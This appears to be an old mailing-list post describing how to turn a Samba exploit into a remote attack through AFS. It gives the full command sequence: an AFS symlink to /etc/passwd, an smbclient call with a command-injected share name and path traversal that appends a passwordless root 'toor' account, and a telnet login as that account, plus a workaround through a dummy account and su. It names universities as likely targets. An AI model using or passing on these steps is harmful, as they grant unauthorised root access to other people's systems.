I was hoping to test this out but haven't been able to, so here goes, theoretically...
How to make this exploit a remote one using AFS or other remote file
systems.
What does this exploit need on the remote side? A
symlink; so... on an AFS system, preferably one of a well-known node that
most AFS servers would have in their CellServDB, such as
andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
x.log like
ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
Now make the symlink world-readable... then all you need is UNIXes running
Samba in the vulnerable configuration and running AFS.
smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor
If root logins aren't allowed, make a dummy account first, log in with that,
then make a toor account on top of that and su over to toor.
What machines does this really affect? Those running Samba and AFS,
mainly educational institutions or other large institutions.
Christopher Palow
[EMAIL PROTECTED]
Senior Electrical and Computer Engineering
Carnegie Mellon University